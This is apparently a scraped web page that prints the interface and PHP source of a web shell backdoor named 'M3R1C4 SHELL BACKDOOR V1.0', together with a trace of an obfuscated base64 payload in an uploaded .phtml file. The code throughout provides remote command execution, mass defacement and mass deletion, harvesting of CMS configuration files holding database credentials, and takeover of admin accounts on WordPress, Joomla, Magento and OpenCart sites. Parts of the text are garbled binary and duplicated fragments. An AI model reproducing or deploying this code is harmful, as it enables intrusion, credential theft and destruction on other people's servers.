$$ Beby $$

Name	Size	Permission	Options
..	NONE	LINK	New File \| New Folder
$dir	DIR	";\r\nif(is_writable("$path/$dir")) echo \'\';\r\nelseif(!is_readable("$path/$dir")) echo \'\';\r\necho perms("$path/$dir");\r\nif(is_writable("$path/$dir") \|\| !is_readable("$path/$dir")) echo \'\';\r\n\r\necho "	\r\nRename Delete Chmod\r\n\r\n
$file	".$size."	";\r\nif(is_writable("$path/$file")) echo \'\';\r\nelseif(!is_readable("$path/$file")) echo \'\';\r\necho perms("$path/$file");\r\nif(is_writable("$path/$file") \|\| !is_readable("$path/$file")) echo \'\';\r\necho "	\r\nEdit Rename Delete Chmod\r\n

Version: 3.1.0beta2 File format: 4 TRACE START [2023-02-12 19:35:39.874839] 1 0 1 0.000145 393528 1 3 0 0.000257 423008 {main} 1 /var/www/html/uploads/img_x.phtml 0 0 1 A /var/www/html/uploads/img_x.phtml 69 $aDriv4 = '7X35W+LI1vDPPc8z/1A119voqxJA3Je5oCyisioC3f34JDEJIoYkkFWYmfdi/0EtTAkItjP33vd4dCFWSJ06SGjqrLVjXGonn6pyQ+Gu0emgd6XWrudlbGeZVyTRr79jXN2QrTGPqgOUFZ5HG3qjb62CFFCd4tRbyTBeFGeETbwuXIm2YCnoCyrJiqp46tjIHOBZesMQRFq1p5BHkwRObPn86y/4H9lDHhR4dzzY1tRF1pMbx7/+b1WSID1VhihVisWP6cdff7FT63DIPUjHlvbw2BMUUH4Yi9r6xsbvv/4yEiRQ1cz1tYfzXKGIRxmtWozB6dkaINwzYw6a8hV//o5BkaxVlijbqnka8jrLBdX8Vv41NEZA8ZPPuqApA9FApjK1z3795cT9NUcd/yqWbxt0eHiodwwHdXrthKNfIIkjbOIE89/wh99RRgQsJtDY05j6KPb4Vjr1r/FHteyEJllwkGZ6qMq2NTmNnRuyyqs8KpiGeiNdSEd+jHe9CfpZ' 2 4 0 0.000319 423120 base64_decode 0 /var/www/html/uploads/img_x.phtml 70 1 '7X35W+LI1vDPPc8z/1A119voqxJA3Je5oCyisioC3f34JDEJIoYkkFWYmfdi/0EtTAkItjP33vd4dCFWSJ06SGjqrLVjXGonn6pyQ+Gu0emgd6XWrudlbGeZVyTRr79jXN2QrTGPqgOUFZ5HG3qjb62CFFCd4tRbyTBeFGeETbwuXIm2YCnoCyrJiqp46tjIHOBZesMQRFq1p5BHkwRObPn86y/4H9lDHhR4dzzY1tRF1pMbx7/+b1WSID1VhihVisWP6cdff7FT63DIPUjHlvbw2BMUUH4Yi9r6xsbvv/4yEiRQ1cz1tYfzXKGIRxmtWozB6dkaINwzYw6a8hV//o5BkaxVlijbqnka8jrLBdX8Vv41NEZA8ZPPuqApA9FApjK1z3795cT9NUcd/yqWbxt0eHiodwwHdXrthKNfIIkjbOIE89/wh99RRgQsJtDY05j6KPb4Vjr1r/FHteyEJllwkGZ6qMq2NTmNnRuyyqs8KpiGeiNdSEd+jHe9CfpZ' 2 4 1 0.000403 443632 2 4 R 'í}ù[âÈÖðÏ=Ï3ÿP5×Ûè«\022@Ü—¹ ,¢²*\002Ýýø$1\t"†$U˜™÷bÿA-L\t\b¶3÷Þ÷xt!VH:Hhê¬µc\\j\'ŸªrCá®Ñé w¥Ö®çelg™W$Ñ¯¿c\\Ý1ª\003”\025žG\033z£o‚\024PâÔ[É0^\024g„M¼.\\‰¶`)è\v*ÉŠªxêØÈ\034àYzÃ\020DZµ§G“\004Nlùüë/ø\037ÙC\036\024xw<ØÖÔEÖ“\033Ç¿þoU’ =U†(UŠÅéÇ_±SëpÈ=HÇ–öðØ\023\024P~\030‹ÚúÆÆï¿þ2\022$PÕÌõµ‡ó\\¡ˆG\031ZŒÁéÙ\032 Ü3c\016šò\025þŽA‘¬U–(Ûªy\032ò:Ë\005ÕüVþ54F@ñ“Ïº )\003Ñ@¦2µÏ~ýåÄý5G\035ÿ*–o\033txx¨w\f\auzí„£_ ‰#lâ\004óßð‡ßQF\004,&ÐØÓ˜ú(öøV:õ¯ñGµì„&Ypfz¨Ê¶59\033²Ê«<*˜†z#]HG~Œw½\túY²ÉâÀGµ‰!½œÆê‚$inyhr){\r\n$_CBFG[$xrl] = fgevcfynfurf($inyhr);\r\n}\r\n}\r\nrpub \'\r\n\r\n\r\n$$ Orol $$\r\n\';\r\n\r\n?>\r\n$inyhr){\r\n$_CBFG[$xrl] = fgevcfynfurf($inyhr);\r\n}\r\n}\r\nrpub \'\r\n\r\n\r\n$$ Orol $$\r\n\';\r\n\r\n?>\r\n$value){\r\n$_POST[$key] = stripslashes($value);\r\n}\r\n}\r\necho \'\r\n\r\n\r\n$$ Beby $$\r\n\';\r\n\r\n?>\r\n$value){\r\n$_POST[$key] = stripslashes($value);\r\n}\r\n}\r\necho \'\r\n\r\n\r\n$$ Beby $$\r\n\';\r\n\r\n?>\r\n\r\n\r\n\r\n\r\n
M3R1C4 SHELL BACKDOOR V1.0
\r\n\r\n\r\n\';\r\nif(isset($_GET[\'filesrc\'])){\r\necho "
\r\n\r\n\'.php_uname().\'
\';\r\nif(isset($_GET[\'path\'])){\r\n$path = $_GET[\'path\'];\r\n}else{\r\n$path = \r\ngetcwd();\r\n}\r\n$path = str_replace(\'\\\\\',\'/\',$path);\r\n$paths = explode(\'/\',$path);\r\n\r\nforeach($paths as $id=>$pat){\r\nif($pat == \'\' && $id == 0){\r\n$a = true;\r\necho \'Current DIR:/\';\r\ncontinue;\r\n}\r\nif($pat == \'\') continue;\r\necho \'\'.$pat.\'/\';\r\n}\r\necho "
";\r\necho "";\r\necho "
";\r\necho "
Home
";\r\necho "
Command
";\r\necho "
Mass Deface
";\r\necho "
Mass Delete
";\r\necho "
Config
";\r\necho "
Jumping
";\r\necho "
CPanel Crack
";\r\necho "
SMTP Grabber
";\r\necho "
Zone-H
";\r\necho "
CGI Telnet
";\r\necho "
network
";\r\necho "
Adminer

";\r\necho "
Fake Root
";\r\necho "
Auto Edit User
";\r\necho "
Auto Edit Title WordPress
";\r\necho "
WordPress Auto Deface
";\r\necho "
WordPress Auto Deface V.2
";\r\necho "
CPanel/FTP Auto Deface
";\r\necho "
";\r\necho "";\r\necho "
";\r\nif($_GET[\'do\'] == \'upload\') {\r\n\techo "";\r\n\tif($_POST[\'upload\']) {\r\n\t\tif(@copy($_FILES[\'ix_file\'][\'tmp_name\'], "$dir/".$_FILES[\'ix_file\'][\'name\']."")) {\r\n\t\t\t$act = "Uploaded! at $dir/".$_FILES[\'ix_file\'][\'name\']."";\r\n\t\t} else {\r\n\t\t\t$act = "failed to upload file";\r\n\t\t}\r\n\t}\r\n\techo "Upload File: [ ".w($dir,"Writeable")." ]
";\r\n\techo $act;\r\n\techo "";\r\n} elseif($_GET[\'do\'] == \'cmd\') {\r\n\techo "
\r\n\t".$user."@".gethostbyname($_SERVER[\'HTTP_HOST\']).":~# \r\n\t>\'>\r\n\t
";\r\n\tif($_POST[\'do_cmd\']) {\r\n\t\techo "
".exe($_POST[\'cmd\'])."
";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'mass_deface\') {\r\n\tfunction sabun_massal($dir,$namafile,$isi_script) {\r\n\t\tif(is_writable($dir)) {\r\n\t\t\t$dira = scandir($dir);\r\n\t\t\tforeach($dira as $dirb) {\r\n\t\t\t\t$dirc = "$dir/$dirb";\r\n\t\t\t\t$lokasi = $dirc.\'/\'.$namafile;\r\n\t\t\t\tif($dirb === \'.\') {\r\n\t\t\t\t\tfile_put_contents($lokasi, $isi_script);\r\n\t\t\t\t} elseif($dirb === \'..\') {\r\n\t\t\t\t\tfile_put_contents($lokasi, $isi_script);\r\n\t\t\t\t} else {\r\n\t\t\t\t\tif(is_dir($dirc)) {\r\n\t\t\t\t\t\tif(is_writable($dirc)) {\r\n\t\t\t\t\t\t\techo "[DONE] $lokasi
";\r\n\t\t\t\t\t\t\tfile_put_contents($lokasi, $isi_script);\r\n\t\t\t\t\t\t\t$idx = sabun_massal($dirc,$namafile,$isi_script);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tfunction sabun_biasa($dir,$namafile,$isi_script) {\r\n\t\tif(is_writable($dir)) {\r\n\t\t\t$dira = scandir($dir);\r\n\t\t\tforeach($dira as $dirb) {\r\n\t\t\t\t$dirc = "$dir/$dirb";\r\n\t\t\t\t$lokasi = $dirc.\'/\'.$namafile;\r\n\t\t\t\tif($dirb === \'.\') {\r\n\t\t\t\t\tfile_put_contents($lokasi, $isi_script);\r\n\t\t\t\t} elseif($dirb === \'..\') {\r\n\t\t\t\t\tfile_put_contents($lokasi, $isi_script);\r\n\t\t\t\t} else {\r\n\t\t\t\t\tif(is_dir($dirc)) {\r\n\t\t\t\t\t\tif(is_writable($dirc)) {\r\n\t\t\t\t\t\t\techo "[DONE] $lokasi
";\r\n\t\t\t\t\t\t\tfile_put_contents($lokasi, $isi_script);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tif($_POST[\'start\']) {\r\n\t\tif($_POST[\'tipe_sabun\'] == \'mahal\') {\r\n\t\t\techo "
";\r\n\t\t\tsabun_massal($_POST[\'d_dir\'], $_POST[\'d_file\'], $_POST[\'script\']);\r\n\t\t\techo "
";\r\n\t\t} elseif($_POST[\'tipe_sabun\'] == \'murah\') {\r\n\t\t\techo "
";\r\n\t\t\tsabun_biasa($_POST[\'d_dir\'], $_POST[\'d_file\'], $_POST[\'script\']);\r\n\t\t\techo "
";\r\n\t\t}\r\n\t} else {\r\n\techo "";\r\n\techo "
\r\n\tTipe Sabun:
\r\n\tBiasaMassal
\r\n\tFolder:
\r\n\t
\r\n\tFilename:
\r\n\t
\r\n\tIndex File:
\r\n\tHacked by
\r\n\t\r\n\t
";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'mass_delete\') {\r\n\tfunction hapus_massal($dir,$namafile) {\r\n\t\tif(is_writable($dir)) {\r\n\t\t\t$dira = scandir($dir);\r\n\t\t\tforeach($dira as $dirb) {\r\n\t\t\t\t$dirc = "$dir/$dirb";\r\n\t\t\t\t$lokasi = $dirc.\'/\'.$namafile;\r\n\t\t\t\tif($dirb === \'.\') {\r\n\t\t\t\t\tif(file_exists("$dir/$namafile")) {\r\n\t\t\t\t\t\tunlink("$dir/$namafile");\r\n\t\t\t\t\t}\r\n\t\t\t\t} elseif($dirb === \'..\') {\r\n\t\t\t\t\tif(file_exists("".dirname($dir)."/$namafile")) {\r\n\t\t\t\t\t\tunlink("".dirname($dir)."/$namafile");\r\n\t\t\t\t\t}\r\n\t\t\t\t} else {\r\n\t\t\t\t\tif(is_dir($dirc)) {\r\n\t\t\t\t\t\tif(is_writable($dirc)) {\r\n\t\t\t\t\t\t\tif(file_exists($lokasi)) {\r\n\t\t\t\t\t\t\t\techo "[DELETED] $lokasi
";\r\n\t\t\t\t\t\t\t\tunlink($lokasi);\r\n\t\t\t\t\t\t\t\t$idx = hapus_massal($dirc,$namafile);\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tif($_POST[\'start\']) {\r\n\t\techo "
";\r\n\t\thapus_massal($_POST[\'d_dir\'], $_POST[\'d_file\']);\r\n\t\techo "
";\r\n\t} else {\r\n\techo "";\r\n\techo "
\r\n\tFolder:
\r\n\t
\r\n\tFilename:
\r\n\t
\r\n\t\r\n\t
";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'config\') {\r\n\t$etc = fopen("/etc/passwd", "r");\r\n\t$idx = mkdir("idx_config", 0777);\r\n\t$isi_htc = "Options all\\nRequire None\\nSatisfy Any";\r\n\t$htc = fopen("idx_config/.htaccess","w");\r\n\tfwrite($htc, $isi_htc);\r\n\twhile($passwd = fgets($etc)) {\r\n\t\tif($passwd == "" || !$etc) {\r\n\t\t\techo "Can\'t read /etc/passwd";\r\n\t\t} else {\r\n\t\t\tpreg_match_all(\'/(.*?):x:/\', $passwd, $user_config);\r\n\t\t\tforeach($user_config[1] as $user_idx) {\r\n\t\t\t\t$user_config_dir = "/home/$user_idx/public_html/";\r\n\t\t\t\tif(is_readable($user_config_dir)) {\r\n\t\t\t\t\t$grab_config = array(\r\n\t\t\t\t\t\t"/home/$user_idx/.my.cnf" => "cpanel",\r\n\t\t\t\t\t\t"/home/$user_idx/.accesshash" => "WHM-accesshash",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/vdo_config.php" => "Voodoo",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/forum/config.php" => "phpBB",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/app/etc/local.xml" => "Magento",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/configuration.php" => "Joomla",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/wp-config.php" => "WordPress",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/admin/config.php" => "OpenCart",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/slconfig.php" => "Sitelok",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/application/config/database.php" => "Ellislab");\r\n\t\t\t\t\tforeach($grab_config as $config => $nama_config) {\r\n\t\t\t\t\t\t$ambil_config = file_get_contents($config);\r\n\t\t\t\t\t\tif($ambil_config == \'\') {\r\n\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t$file_config = fopen("idx_config/$user_idx-$nama_config.txt","w");\r\n\t\t\t\t\t\t\tfputs($file_config,$ambil_config);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\t\t\r\n\t\t\t}\r\n\t\t}\t\r\n\t}\r\n\techo "Done";\r\n} elseif($_GET[\'do\'] == \'jumping\') {\r\n\t$i = 0;\r\n\techo "
";\r\n\t$etc = fopen("/etc/passwd", "r");\r\n\twhile($passwd = fgets($etc)) {\r\n\t\tif($passwd == \'\' || !$etc) {\r\n\t\t\techo "Can\'t read /etc/passwd";\r\n\t\t} else {\r\n\t\t\tpreg_match_all(\'/(.*?):x:/\', $passwd, $user_jumping);\r\n\t\t\tforeach($user_jumping[1] as $user_idx_jump) {\r\n\t\t\t\t$user_jumping_dir = "/home/$user_idx_jump/public_html";\r\n\t\t\t\tif(is_readable($user_jumping_dir)) {\r\n\t\t\t\t\t$i++;\r\n\t\t\t\t\t$jrw = "[R] $user_jumping_dir";\r\n\t\t\t\t\tif(is_writable($user_jumping_dir)) {\r\n\t\t\t\t\t\t$jrw = "[RW] $user_jumping_dir";\r\n\t\t\t\t\t}\r\n\t\t\t\t\techo $jrw;\r\n\t\t\t\t\tif(function_exists(\'posix_getpwuid\')) {\r\n\t\t\t\t\t\t$domain_jump = file_get_contents("/etc/named.conf");\t\r\n\t\t\t\t\t\tif($domain_jump == \'\') {\r\n\t\t\t\t\t\t\techo " => ( gabisa ambil nama domain nya )
";\r\n\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\tpreg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);\r\n\t\t\t\t\t\t\tforeach($domains_jump[1] as $dj) {\r\n\t\t\t\t\t\t\t\t$user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));\r\n\t\t\t\t\t\t\t\t$user_jumping_url = $user_jumping_url[\'name\'];\r\n\t\t\t\t\t\t\t\tif($user_jumping_url == $user_idx_jump) {\r\n\t\t\t\t\t\t\t\t\techo " => ( $dj )
";\r\n\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo "
";\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tif($i == 0) { \r\n\t} else {\r\n\t\techo "
Total ada ".$i." Kamar di ".gethostbyname($_SERVER[\'HTTP_HOST\'])."";\r\n\t}\r\n\techo "
";\r\n} elseif($_GET[\'do\'] == \'auto_edit_user\') {\r\n\tif($_POST[\'hajar\']) {\r\n\t\tif(strlen($_POST[\'pass_baru\']) < 6 OR strlen($_POST[\'user_baru\']) < 6) {\r\n\t\t\techo "username atau password harus lebih dari 6 karakter";\r\n\t\t} else {\r\n\t\t\t$user_baru = $_POST[\'user_baru\'];\r\n\t\t\t$pass_baru = md5($_POST[\'pass_baru\']);\r\n\t\t\t$conf = $_POST[\'config_dir\'];\r\n\t\t\t$scan_conf = scandir($conf);\r\n\t\t\tforeach($scan_conf as $file_conf) {\r\n\t\t\t\tif(!is_file("$conf/$file_conf")) continue;\r\n\t\t\t\t$config = file_get_contents("$conf/$file_conf");\r\n\t\t\t\tif(preg_match("/JConfig|joomla/",$config)) {\r\n\t\t\t\t\t$dbhost = ambilkata($config,"host = \'","\'");\r\n\t\t\t\t\t$dbuser = ambilkata($config,"user = \'","\'");\r\n\t\t\t\t\t$dbpass = ambilkata($config,"password = \'","\'");\r\n\t\t\t\t\t$dbname = ambilkata($config,"db = \'","\'");\r\n\t\t\t\t\t$dbprefix = ambilkata($config,"dbprefix = \'","\'");\r\n\t\t\t\t\t$prefix = $dbprefix."users";\r\n\t\t\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\r\n\t\t\t\t\t$db = mysql_select_db($dbname);\r\n\t\t\t\t\t$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");\r\n\t\t\t\t\t$result = mysql_fetch_array($q);\r\n\t\t\t\t\t$id = $result[\'id\'];\r\n\t\t\t\t\t$site = ambilkata($config,"sitename = \'","\'");\r\n\t\t\t\t\t$update = mysql_query("UPDATE $prefix SET username=\'$user_baru\',password=\'$pass_baru\' WHERE id=\'$id\'");\r\n\t\t\t\t\techo "Config => ".$file_conf."
";\r\n\t\t\t\t\techo "CMS => Joomla
";\r\n\t\t\t\t\tif($site == \'\') {\r\n\t\t\t\t\t\techo "Sitename => error, gabisa ambil nama domain nya
";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo "Sitename => $site
";\r\n\t\t\t\t\t}\r\n\t\t\t\t\tif(!$update OR !$conn OR !$db) {\r\n\t\t\t\t\t\techo "Status => ".mysql_error()."

";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo "Status => sukses edit user, silakan login dengan user & pass yang baru.

";\r\n\t\t\t\t\t}\r\n\t\t\t\t\tmysql_close($conn);\r\n\t\t\t\t} elseif(preg_match("/WordPress/",$config)) {\r\n\t\t\t\t\t$dbhost = ambilkata($config,"DB_HOST\', \'","\'");\r\n\t\t\t\t\t$dbuser = ambilkata($config,"DB_USER\', \'","\'");\r\n\t\t\t\t\t$dbpass = ambilkata($config,"DB_PASSWORD\', \'","\'");\r\n\t\t\t\t\t$dbname = ambilkata($config,"DB_NAME\', \'","\'");\r\n\t\t\t\t\t$dbprefix = ambilkata($config,"table_prefix = \'","\'");\r\n\t\t\t\t\t$prefix = $dbprefix."users";\r\n\t\t\t\t\t$option = $dbprefix."options";\r\n\t\t\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\r\n\t\t\t\t\t$db = mysql_select_db($dbname);\r\n\t\t\t\t\t$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");\r\n\t\t\t\t\t$result = mysql_fetch_array($q);\r\n\t\t\t\t\t$id = $result[ID];\r\n\t\t\t\t\t$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");\r\n\t\t\t\t\t$result2 = mysql_fetch_array($q2);\r\n\t\t\t\t\t$target = $result2[option_value];\r\n\t\t\t\t\tif($target == \'\') {\r\n\t\t\t\t\t\t$url_target = "Login => error, gabisa ambil nama domain nyaa
";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\t$url_target = "Login => $target/wp-login.php
";\r\n\t\t\t\t\t}\r\n\t\t\t\t\t$update = mysql_query("UPDATE $prefix SET user_login=\'$user_baru\',user_pass=\'$pass_baru\' WHERE id=\'$id\'");\r\n\t\t\t\t\techo "Config => ".$file_conf."
";\r\n\t\t\t\t\techo "CMS => Wordpress
";\r\n\t\t\t\t\techo $url_target;\r\n\t\t\t\t\tif(!$update OR !$conn OR !$db) {\r\n\t\t\t\t\t\techo "Status => ".mysql_error()."

";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo "Status => sukses edit user, silakan login dengan user & pass yang baru.

";\r\n\t\t\t\t\t}\r\n\t\t\t\t\tmysql_close($conn);\r\n\t\t\t\t} elseif(preg_match("/Magento|Mage_Core/",$config)) {\r\n\t\t\t\t\t$dbhost = ambilkata($config,"");\r\n\t\t\t\t\t$dbuser = ambilkata($config,"");\r\n\t\t\t\t\t$dbpass = ambilkata($config,"");\r\n\t\t\t\t\t$dbname = ambilkata($config,"");\r\n\t\t\t\t\t$dbprefix = ambilkata($config,"");\r\n\t\t\t\t\t$prefix = $dbprefix."admin_user";\r\n\t\t\t\t\t$option = $dbprefix."core_config_data";\r\n\t\t\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\r\n\t\t\t\t\t$db = mysql_select_db($dbname);\r\n\t\t\t\t\t$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");\r\n\t\t\t\t\t$result = mysql_fetch_array($q);\r\n\t\t\t\t\t$id = $result[user_id];\r\n\t\t\t\t\t$q2 = mysql_query("SELECT * FROM $option WHERE path=\'web/secure/base_url\'");\r\n\t\t\t\t\t$result2 = mysql_fetch_array($q2);\r\n\t\t\t\t\t$target = $result2[value];\r\n\t\t\t\t\tif($target == \'\') {\r\n\t\t\t\t\t\t$url_target = "Login => error, gabisa ambil nama domain nyaa
";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\t$url_target = "Login => $target/admin/
";\r\n\t\t\t\t\t}\r\n\t\t\t\t\t$update = mysql_query("UPDATE $prefix SET username=\'$user_baru\',password=\'$pass_baru\' WHERE user_id=\'$id\'");\r\n\t\t\t\t\techo "Config => ".$file_conf."
";\r\n\t\t\t\t\techo "CMS => Magento
";\r\n\t\t\t\t\techo $url_target;\r\n\t\t\t\t\tif(!$update OR !$conn OR !$db) {\r\n\t\t\t\t\t\techo "Status => ".mysql_error()."

";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo "Status => sukses edit user, silakan login dengan user & pass yang baru.

";\r\n\t\t\t\t\t}\r\n\t\t\t\t\tmysql_close($conn);\r\n\t\t\t\t} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {\r\n\t\t\t\t\t$dbhost = ambilkata($config,"\'DB_HOSTNAME\', \'","\'");\r\n\t\t\t\t\t$dbuser = ambilkata($config,"\'DB_USERNAME\', \'","\'");\r\n\t\t\t\t\t$dbpass = ambilkata($config,"\'DB_PASSWORD\', \'","\'");\r\n\t\t\t\t\t$dbname = ambilkata($config,"\'DB_DATABASE\', \'","\'");\r\n\t\t\t\t\t$dbprefix = ambilkata($config,"\'DB_PREFIX\', \'","\'");\r\n\t\t\t\t\t$prefix = $dbprefix."user";\r\n\t\t\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\r\n\t\t\t\t\t$db = mysql_select_db($dbname);\r\n\t\t\t\t\t$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");\r\n\t\t\t\t\t$result = mysql_fetch_array($q);\r\n\t\t\t\t\t$id = $result[user_id];\r\n\t\t\t\t\t$target = ambilkata($config,"HTTP_SERVER\', \'","\'");\r\n\t\t\t\t\tif($target == \'\') {\r\n\t\t\t\t\t\t$url_target = "Login => error, gabisa ambil nama domain nyaa
";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\t$url_target = "Login => $target
";\r\n\t\t\t\t\t}\r\n\t\t\t\t\t$update = mysql_query("UPDATE $prefix SET username=\'$user_baru\',password=\'$pass_baru\' WHERE user_id=\'$id\'");\r\n\t\t\t\t\techo "Config => ".$file_conf."
";\r\n\t\t\t\t\techo "CMS => OpenCart
";\r\n\t\t\t\t\techo $url_target;\r\n\t\t\t\t\tif(!$update OR !$conn OR !$db) {\r\n\t\t\t\t\t\techo "Status => ".mysql_error()."

";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo "Status => sukses edit user, silakan login dengan user & pass yang baru.

";\r\n\t\t\t\t\t}\r\n\t\t\t\t\tmysql_close($conn);\r\n\t\t\t\t} elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {\r\n\t\t\t\t\t$dbhost = ambilkata($config,\'server = "\',\'"\');\r\n\t\t\t\t\t$dbuser = ambilkata($config,\'username = "\',\'"\');\r\n\t\t\t\t\t$dbpass = ambilkata($config,\'password = "\',\'"\');\r\n\t\t\t\t\t$dbname = ambilkata($config,\'database = "\',\'"\');\r\n\t\t\t\t\t$prefix = "users";\r\n\t\t\t\t\t$option = "identitas";\r\n\t\t\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\r\n\t\t\t\t\t$db = mysql_select_db($dbname);\r\n\t\t\t\t\t$q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");\r\n\t\t\t\t\t$result = mysql_fetch_array($q);\r\n\t\t\t\t\t$target = $result[alamat_website];\r\n\t\t\t\t\tif($target == \'\') {\r\n\t\t\t\t\t\t$target2 = $result[url];\r\n\t\t\t\t\t\t$url_target = "Login => error, gabisa ambil nama domain nyaa
";\r\n\t\t\t\t\t\tif($target2 == \'\') {\r\n\t\t\t\t\t\t\t$url_target2 = "Login => error, gabisa ambil nama domain nyaa
";\r\n\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t$cek_login3 = file_get_contents("$target2/adminweb/");\r\n\t\t\t\t\t\t\t$cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");\r\n\t\t\t\t\t\t\tif(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {\r\n\t\t\t\t\t\t\t\t$url_target2 = "Login => $target2/adminweb
";\r\n\t\t\t\t\t\t\t} elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {\r\n\t\t\t\t\t\t\t\t$url_target2 = "Login => $target2/lokomedia/adminweb
";\r\n\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\t$url_target2 = "Login => $target2 [ gatau admin login nya dimana :p ]
";\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\t$cek_login = file_get_contents("$target/adminweb/");\r\n\t\t\t\t\t\t$cek_login2 = file_get_contents("$target/lokomedia/adminweb/");\r\n\t\t\t\t\t\tif(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {\r\n\t\t\t\t\t\t\t$url_target = "Login => $target/adminweb
";\r\n\t\t\t\t\t\t} elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {\r\n\t\t\t\t\t\t\t$url_target = "Login => $target/lokomedia/adminweb
";\r\n\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t$url_target = "Login => $target [ gatau admin login nya dimana :p ]
";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t\t$update = mysql_query("UPDATE $prefix SET username=\'$user_baru\',password=\'$pass_baru\' WHERE level=\'admin\'");\r\n\t\t\t\t\techo "Config => ".$file_conf."
";\r\n\t\t\t\t\techo "CMS => Lokomedia
";\r\n\t\t\t\t\tif(preg_match(\'/error, gabisa ambil nama domain nya/\', $url_target)) {\r\n\t\t\t\t\t\techo $url_target2;\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo $url_target;\r\n\t\t\t\t\t}\r\n\t\t\t\t\tif(!$update OR !$conn OR !$db) {\r\n\t\t\t\t\t\techo "Status => ".mysql_error()."

";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo "Status => sukses edit user, silakan login dengan user & pass yang baru.

";\r\n\t\t\t\t\t}\r\n\t\t\t\t\tmysql_close($conn);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\techo "\r\n\t\t
Auto Edit User Config
\r\n\t\t
\r\n\t\tDIR Config:
\r\n\t\t

\r\n\t\tSet User & Pass:
\r\n\t\t
\r\n\t\t
\r\n\t\t\r\n\t\t
\r\n\t\tNB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
